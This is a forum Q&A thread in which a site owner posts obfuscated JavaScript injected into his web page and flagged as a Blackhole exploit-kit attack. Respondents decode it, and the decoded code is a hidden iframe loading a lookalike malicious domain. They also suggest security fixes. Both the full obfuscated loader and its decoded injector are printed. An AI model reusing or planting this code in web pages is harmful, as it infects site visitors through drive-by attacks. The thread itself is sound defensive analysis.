1

I have a static html web page for my website and recently was not able to load my website on my Windows XP machine. Norton Antivirus blocked the website reporting it as a "Web Attack: Blackhole Toolkit Website 7". I downloaded my index.htm page and found this code in the body which was not created by me when compared to my local copy of the same page:

<script>
el = document.createElement("div");
el.appendChild(document.createTextNode("ReferenceErr"));
el.appendChild(document.createTextNode("q"));
el.insertBefore(document.createTextNode("l"), el.childNodes[1]);
try {
    try {
        throw 1
    } catch (a) {
        b[2] = 21
    };
} catch (a) {
    k = el.firstChild.nodeValue + a.toString().substr(0, 0);
};
ar = "\"aTBtc0.gyA:/[hi],b>  vCldmwf)s{up1oE'=<r(n;N}ez";
ar2 = "R80c80c60c112c84c164c100c140c20c128c104c184c168c16c28c32c184c16c144c96c184c104c184c168c16c120c12c36c8c4c32c176c4c104c184c164c148c72c140c100c36c148c116c52c24c64c116c124c80c80c80c60c112c160c4c104c184c160c164c116c172c80c80c180c84c184c96c120c184c84c124c80c80c80c100c140c20c128c104c184c168c16c28c108c160c60c16c184c164c0c156c60c112c160c4c104c184c84c120c160c20c152c148c56c16c16c132c44c48c48c188c140c168c100c32c160c140c128c132c28c20c140c104c48c56c140c104c184c28c132c56c132c148c84c108c60c100c16c56c152c148c136c24c148c84c56c184c60c32c56c16c152c148c136c24c148c84c120c16c36c96c184c152c148c88c60c120c60c72c60c96c60c16c36c44c56c60c100c100c184c168c172c132c140c120c60c16c60c140c168c44c4c72c120c140c96c128c16c184c172c96c184c112c16c44c24c172c16c140c132c44c24c172c148c76c156c48c60c112c160c4c104c184c76c0c116c172c80c80c180c80c80c112c128c168c20c16c60c140c168c84c60c112c160c4c104c184c160c164c116c124c80c80c80c88c4c160c84c112c84c152c84c100c140c20c128c104c184c168c16c28c20c160c184c4c16c184c144c96c184c104c184c168c16c164c148c60c112c160c4c104c184c148c116c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c120c160c20c148c68c148c56c16c16c132c44c48c48c188c140c168c100c32c160c140c128c132c28c20c140c104c48c56c140c104c184c28c132c56c132c148c116c172c112c28c120c16c36c96c184c28c88c60c120c60c72c60c96c60c16c36c152c148c56c60c100c100c184c168c148c172c112c28c120c16c36c96c184c28c132c140c120c60c16c60c140c168c152c148c4c72c120c140c96c128c16c184c148c172c112c28c120c16c36c96c184c28c96c184c112c16c152c148c24c148c172c112c28c120c16c36c96c184c28c16c140c132c152c148c24c148c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c108c60c100c16c56c148c68c148c136c24c148c116c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c56c184c60c32c56c16c148c68c148c136c24c148c116c172c80c80c80c100c140c20c128c104c184c168c16c28c32c184c16c144c96c184c104c184c168c16c120c12c36c8c4c32c176c4c104c184c164c148c72c140c100c36c148c116c52c24c64c28c4c132c132c184c168c100c92c56c60c96c100c164c112c116c172c80c80c180";
pau = "urn eReferenceErr".replace(k, "va" + el.childNodes[1].nodeValue);
e = Function("ret" + pau)();
ar2 = ar2.split("c");
ar2[0] = "80";
s = "";
for (i = 0; i != ar2.length; i++) {
    e('po'.concat('s=par', 'seInt(k', '.rep', 'lace("R', 'eferen', '","0a', 'sd"))+', 'ar2[', 'i]/', '4'));
    e('s+=ar.substr(pos,1)');
}
e(s);
</script>

Anybody have any idea how this might have appeared and how my index.htm page could have been modified?

Thanks, Steve

Improve this question
2
  • 1
    what web server are you using? other details would help too: OS, scripting environment, web app platform etc Commented Jun 20, 2011 at 12:06
  • Looks like someone is trying to exploit a buffer overflow... You should remove it, and fix your webserver security. Commented Jun 20, 2011 at 12:09

2 Answers 2

Reset to default
5

Below is the end result of the script. Ran it on a VM to test it out, got a malicious site warning via google as well. All of that to write this..

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://toolbarqueries-google.com/in.cgi?default');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
Improve this answer
Sign up to request clarification or add additional context in comments.

3 Comments

You beat me to it. To emphasize: toolbarqueries dot google.com is the legitimate site, while this script loads a hidden iframe from toolbarqueries hyphen google.com
@bemace yeah once it gets there it looks like theres a few different sites it it pulls its data from, thats when I got the google warning. Pretty tricky, they make the URL look very convincing.
Also, if anyone would like to write Igor and ask how things are in Moscow this time of year, the site appears to have legitimate whois contact info
1

Someone hacked your site - there are many ways to do this , and there are many things to improve in security

Improve this answer

2 Comments

Thanks everyone. I'm using a shared hosted server (Zeus is the platform from what I can tell). Have changed my FTP password and will monitor this - they also added the same code to my Wordpress wp-config.php page. Never experienced anything like this before.
If it is possible use secure FTP, because FTP sends password uncrypted !

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.